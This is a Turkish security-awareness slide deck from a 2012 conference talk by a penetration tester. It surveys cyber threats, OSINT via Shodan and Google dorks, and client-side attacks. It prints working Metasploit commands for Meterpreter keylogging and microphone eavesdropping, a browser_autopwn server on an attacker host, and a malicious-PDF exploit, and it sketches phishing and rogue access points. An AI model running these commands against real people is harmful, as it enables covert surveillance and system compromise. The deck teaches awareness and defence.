Yeni Dünya Düzeninde Siber Saldırılar ve

Güncel Siber Tehditler

Ozan UÇAR

ozan.ucar@bga.com.tr

Boğaziçi Compec, EXIT 2012 İstanbul

Konuşmacı Hakkında

• Bilgi Güvenliği Uzmanı ve Eğitmen

– Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr)

• Penetration Tester

• Blog Yazarı

– www.cehturkiye.com

– blog.bga.com.tr

• İletişim

– Skype: ozan.ucar

– Eposta: ozan.ucar@bga.com.tr

www.bga.com.tr 2

Genel Konu Başlıkları

• Yeni Dünya Düzeninde Siber Güvenliğin Rolü

• Siber Tehditler

• Siber İstihbarat Toplama Yöntemleri

• İstemci Tabanlı Saldırı Türleri

• Başarılı Bir Saldırı Sonrası Olası Tehditler

• Casus Yazılım Tehlikeleri

• Kablosuz Ağlara Yönelik Saldırılar

www.bga.com.tr 3

Bilgilendirme

• Bu sunumdaki tüm ekran görüntüleri internet üzerindeki açık kaynaklardan elde edilmiştir.

www.bga.com.tr 4

Hacking Kültürü Hakkında

Bilgisayar yer altı dünyası bir aynalı salondur. Gerçekler bükülür, doğrular küçülür.

www.bga.com.tr 5

Genel Terim ve Kavramlar

Siber savaş(cyber warfare), siber tehditler, siber suç(cyber crime), cyber espionage, cyber intelligence, siber sabotaj(cyber sabotage), siber terörizm (Cyberterrorism), siber casusluk (Cyber spying), siber silah (cyber o weapon), sızma testleri (penetration test), siber güvenlik yarışmaları(CTF -Capture The Flag)

Yeni Dünya Düzeninde Siber Güvenlik

Firmalara Etkileri

• Sanayi casusluğu

• Prestij kaybı

• Maddi kayıplar

• İnternek kaynaklarını servis dışı bırakma (DDOS)

• Sahte belge

RSA

RSA Detay

15 Yaşında, Gerçek Bir Tehdit…

ISP’nin DDoS’a Cevabı

Botnet Satın Alma

Operation Digiturk

http://anonnews.org/press/item/1351/

Siber Şantaj

SONY

Açık Kaynak İstihbarat Toplama Yöntemleri

• OSINT, Internet kaynakları kullanarak hedef sistem/kişiler hakkında bilgi toplama ve bu bilgileri hedef sistem/kişi hakkında değer ifadece edecek formata dönüştürme.

• Temelde iki bölümden oluşur:

– Görünen açık kaynaklardan bilgi toplama

– Genele açık olmayan forumlar/IRC odaları kullanarak bilgi toplama

Bilgi Toplama

• Hackerların sistemlere saldırmadan önce internet üzerinden nasıl bilgi edindikleri, bu bilgilerin nerelerde kullanıldığının anlaşılması.

• Sistemli çalışan bir hacker herşeyden önce istihbarat toplama işlemi/keşif)yapar.

Bilgi Toplama Yöntemleri

• Amaç hedef sistem hakkında olabildiğince çok bilgi toplamaktır.

• Bilgi toplama;

– Hedef sistemle doğrudan iletişime geçerek

– Hedef sistemden bağımsız olmak üzere iki türdür.

• Bilgi toplama yöntemleri

– Pasif bilgi toplama

– Aktif bilgi toplama

Arama Motorlarından Bilgi Toplama

• Arama motoru != Google

• Google haricinde özellştirilmiş arama motorları da vardır

• ShodanHQ – Pentesterlar için

• Pipl.com kişiler hakkında toplu bilgi edinme amaçlı

Pipl.com Aracılığı ile Şahıs Arama

• Pipl.com kiş arama için en ideal sonuçları bulan bir arama motorudur

Shodan

• Değişik bir arama motoru:Shodanhq.com

• Tamamen güvenlik testleri yapanlara yönelik geliştirilmiş bir sistem mantığıyla çalışır – Internete açık sistemlerde default bırakılmış

parolaları bulma

• SHODAN, filtreler kullanarak çeşitli bilgisayar tabanlı sistemleri (desktop, switch, router, servers vb.) bulmayı sağlayan bir arama motorudur

Shodan Örnek

“default password”

net:1.1.1.1/24

“cisco-ios” “last-modified” country:TR

Google Aracılığıyla Bilgi Toplama

• Google üzerinden “gelişmiş” arama yapmak için çeşitli teknikler bulunmaktadır.

• Bu tekniklere GoogleHacking adı verilir. – Bu teknikler çeşitli özel kelimelerden oluşur ve genelde akılda

kalmaz

• Efektif arama yapabilmek için bu kelimeleri ezberlemek yerine – Bu özel kelimeleri barındıran çeşitli programlar kullanılabilir

• Bu programlardan en kullanışlı olanı GoolagScanner’dir. • Alternatif olarak Google Hacking terimini bize kazandıran

GHD(google hacking database) kullanılabilir

Google Arama İpuçları

• Site:www.google.com – Sadece google.com için arama yapar

• Allintitle:Security admin – Title’inda security ve admin geçenleri arar

• İnurl:test deneme – url’de test geri kalan kısımlarda deneme içeren

sonuçlar

• Allinurl:google test – Url de google ve test içeren sonuçlar

Google Hacking Database (GHDB)

http://www.exploit-db.com/google-dorks/

Google’dan Hesap Bilgileri

Örnek:.bash_history

http://www.southerndivasecrets.com/.bash_history Uygulama

Türkiye’den Örnekler

Siber Savaşın Devletlere Etkileri

• Ülkeleri sarsan siber savaşlar

• Çağın en tehlikeli siber silahları: Stuxnet, Duqu

• Ddos saldırıları

• Hactivist aktiviter

• Veri sızdırma girişimleri

• Ajan yazılımlar

• ….

LULZSEC

• Ekip kimlerden oluşuyor ?

• Operasyonları ticari mi politik mi ?

• Özgürlük savaşçıları mı ?

• Ellerinde, kimlere ait ne kadar

veri var ?

http://twitter.com/#!/LulzSec

ANONYMOUS

STUXNET & DUQU

BTK Veritabanı Sızdırıldı

Siber Suçlardan İlk İstifa

Türkiye’nin Kimlik Haritası..

Son Kullanıcıya Yönelik Saldırılar

• Kişisel veriler

• Banka bilgileri

• Eposta hesapları

• MSN/Skype yazışmaları

• Gizli webcam görüntüleri

• Ortam dinleme

• Facebook, Twitter hesapları

• ….

www.bga.com.tr 40

1.200.000 Kişinin Hassas Bilgileri Internet’te

İstemci Tabanlı Saldırı Türleri

• Browser (İnternet Tarayıcılar)

• Eposta Yazılımları

• PDF Okuyucular

• Office Yazılımları

• XSS Saldırıları

• Java Uygulamaları

• Media Player

• Casus Yazılımlar

• Sosyal Mühendislik www.bga.com.tr 42

Saldırı Sonrası Olası Tehditler

• Keylogger Kurulumu

– Klavye girişlerinin dinlenmesi

• Webcam Casusu

– Gizli video kaydı, fotoğraf çekimi

• Ortam Dinleme

– Ses kaydı

• Veri Sızdırma

– Kayıtlı parolalar, önemli ofis dosyaları vb.

• Bilgisayarı Köleleştirme

– Botnet ordusuna katılma, DDOS saldırılarında bulunma

www.bga.com.tr 43

İstemci Bilgisayarlar Nasıl Korunuyor ?

• Antivirüs Yazılımları

– Antivirus motorları

– İmza tabanlı & Sezgisel

– Bypass teknikleri

• Kişisel Firewall Yazılımları

– Atlatma senaryoları ...

• Bilinç

– Farkındalık ve eğitimin

www.bga.com.tr 44

Tanınmaz Meterpreter Ajanı

www.bga.com.tr 45

Antivirus Test

Tarama Sonucu:

http://goo.gl/2M1wy

www.bga.com.tr 46

Meterpreter | Keylogger

www.bga.com.tr 47

Keylogger olarak kullanımı;

> keyscan_start

> keyscan_dump

Hedefin ekran görüntüsünü ele geçirme

> screeshot

Meterpreter | Webcam Casusu

www.bga.com.tr 48

Webcam görüntüsünü ele geçirmek

Webcam canlı video görüntüsünü almak

Meterpreter | Ortam Dinleme

www.bga.com.tr 49

Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir.

// 25. sn boyunca dinleme yap ve kaydet.

record_mic -d 25

[*] Starting...

[*] Stopped

Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav

Ajan Marmara (Sanal Klavye Ajanı)

www.bga.com.tr 50

Web İnjection

www.bga.com.tr 51

Video

Browser Tabanlı Açıklıklar

• Bir browser exploiti, kötü amaçlı geliştirilmiş zararlı kod parçasıdır.

• Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım bulaştırmak veya izinsiz/yetkisiz değişikliklerde bulunmak için kullanılır.

• Zararlı kod; HTML, Image, Java, Javascript, ActiveX veya başka bir web teknolojisi olabilir.

• Zayıflıklar, browser teknolojisinden veya eklentilerinden kaynaklanabilir.

www.bga.com.tr 52

Browser Tabanlı Açıklıklar | Uygulama

• Browser Autopwn ile otomotik browser exploit msf > use auxiliary/server/browser_autopwn

msf auxiliary(browser_autopwn) > set LHOST saldirgan.com

LHOST => 85.95.238.172

msf auxiliary(browser_autopwn) > set SRVPORT 80

SRVPORT => 80

msf auxiliary(browser_autopwn) > set URIPATH /giris

URIPATH => /giris

msf auxiliary(browser_autopwn) > exploit

[*] --- Done, found 23 exploit modules

[*] Using URL: http://0.0.0.0:80/giris

[*] Local IP: http://saldirgan.com :80/giris

www.bga.com.tr 53

PDF Okuyucular| Uygulama

PDF formatının popüler olması ile birlikte, PDF okuyucuların açıklıklarları etkili bir hacking malzemesi haline gelmiştir.

• Adobe Reader msf > use exploit/windows/fileformat/adobe_geticon

msf exploit(adobe_geticon) > set FILENAME belge.pdf

FILENAME => belge.pdf

msf exploit(adobe_geticon) > exploit

[*] Creating 'belge.pdf' file...

[+] belge.pdf stored at /var/www/belge.pdf

www.bga.com.tr 54

Sosyal Mühendislik Saldırıları

Teknik sorunlar teknik yollarla çözülür, insan tabanlı sorunlar insanla çözülür …

• Oltalama saldırıları

– facebook.com > facabook.com

• Bir web sitesinin bire bir benzerini (clone) oluşturmak

• Java Uygulamaları

• Sahte Kablosuz Ağlar

www.bga.com.tr 55

En Zayıf Halka: İnsan

www.bga.com.tr 56

SM | Oltalama Saldırıları

www.bga.com.tr 57

1

3 2

Sahte Eposta Gönderme

www.bga.com.tr 58

Sahte Eposta Gönderme

www.bga.com.tr 59

SM | Web Clone & Java Applet

Social-Engineer Toolkit

www.bga.com.tr 60

Java uygulaması olarak casus yazılım bulaştırma

Sahte Kablosuz Erişim Noktaları

• Yalnızca amacı kötü olduğu için “sahte” olarak isimlendirilir, gerçeğinden ayırt edilemez

• Kablosuz ağ istemcileri, saldırgan tarafından yayın yapan kablosuz ağa dahil oldukdan sonra, tüm internet trafiği kaydedilir.

• DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir.

www.bga.com.tr 61

Sahte Kablosuz Erişim Noktaları

www.bga.com.tr 62

Saldırı yapılan sistemden ekran görüntüsü

Sahte Kablosuz Erişim Noktaları

www.bga.com.tr 63

İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban bilgisayara yüklenir.

Teşekkürler